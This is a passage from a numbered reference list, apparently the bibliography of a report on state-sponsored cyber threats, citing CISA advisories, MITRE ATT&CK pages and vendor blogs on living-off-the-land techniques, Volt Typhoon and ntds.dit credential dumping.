49. Cyber Threat Trends: Living Off the Land (LOTL) – Armis, [https://www.armis.com/blog/cyber-threat-trends-living-off-the-land-lotl/]

50. People’s Republic of China State-Sponsored Cyber Actor Living off the Land to Evade Detection | CISA, [https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-144a]

51. How To Disable Directory Listing on Your Web Server – Invicti, [https://www.invicti.com/blog/web-security/disable-directory-listing-web-servers/]

52. When Misconfigurations Open the Door to Russian Attackers, [https://www.cisecurity.org/insights/blog/when-misconfigurations-open-the-door-to-russian-attackers]

53. Russian State-Sponsored Cyber Actors Target Cleared Defense Contractor Networks to Obtain Sensitive U.S. Defense Information and Technology | CISA, [https://www.cisa.gov/news-events/cybersecurity-advisories/aa22-047a]

54. PRC State-Sponsored Actors Compromise and Maintain Persistent Access to U.S. Critical Infrastructure | CISA, [https://www.cisa.gov/news-events/cybersecurity-advisories/aa24-038a]

55. Understanding and Mitigating Russian State-Sponsored Cyber Threats to U.S. Critical Infrastructure | CISA, [https://www.cisa.gov/news-events/cybersecurity-advisories/aa22-011a]

56. Volt Typhoon targets US critical infrastructure with living-off-the-land techniques | Microsoft Security Blog, [https://www.microsoft.com/en-us/security/blog/2023/05/24/volt-typhoon-targets-us-critical-infrastructure-with-living-off-the-land-techniques/]

57. Hunting for APT28/Hafnium NTDS.dit Domain Controller Credential Harvesting [MITRE ATT&CK T1003.003] – Insane Cyber, [https://insanecyber.com/hunting-for-apt28-hafnium-ntds-dit-domain-controller-credential-harvesting-mitre-attck-t1003-003/]

58. An insider insights into Conti operations – Part two – Sekoia.io Blog, [https://blog.sekoia.io/an-insider-insights-into-conti-operations-part-two/]

59. Volt Typhoon: The Chinese APT Group Abuse LOLBins for Cyber Espionage, [https://www.picussecurity.com/resource/blog/volt-typhoon-the-chinese-apt-group-abuse-lolbins-for-cyber-espionage]

60. OS Credential Dumping: NTDS, Sub-technique T1003.003 – Enterprise | MITRE ATT&CK®, [https://attack.mitre.org/techniques/T1003/003/]

61. Volt Typhoon: Targeted Attacks on U.S. Critical Infrastructure – Avertium, [https://www.avertium.com/resources/threat-reports/volt-typhoon-targeted-attacks-on-us-critical-infrastructure]

62. Suspicious dump of ntds.dit using Shadow Copy with ntdsutil/vssadmin – Cortex Help Center, [https://docs-cortex.paloaltonetworks.com/r/Cortex-XDR/Cortex-XDR-Analytics-Alert-Reference-by-Alert-name/Suspicious-dump-of-ntds.dit-using-Shadow-Copy-with-ntdsutil/vssadmin]

63. Russian GRU Targeting Western Logistics Entities and Technology Companies – CISA, [https://www.cisa.gov/news-events/cybersecurity-advisories/aa25-141a]

64. CVE-2022-30625 Detail – NVD, [https://nvd.nist.gov/vuln/detail/CVE-2022-30625]

65. Russian State-Sponsored and Criminal Cyber Threats to Critical Infrastructure | CISA, [https://www.cisa.gov/news-events/cybersecurity-advisories/aa22-110a]

66. UNC2452 Merged into APT29 | Russia-Based Espionage Group | Google Cloud Blog, [https://cloud.google.com/blog/topics/threat-intelligence/unc2452-merged-into-apt29/]

67. Russian State-Sponsored Cyber Actors Gain Network Access by …, [https://www.cisa.gov/news-events/cybersecurity-advisories/aa22-074a]

68. Russia’s Trident Ursa (aka Gamaredon APT) Cyber Conflict Operations Unwavering Since Invasion of Ukraine – Unit 42, [https://unit42.paloaltonetworks.com/trident-ursa/]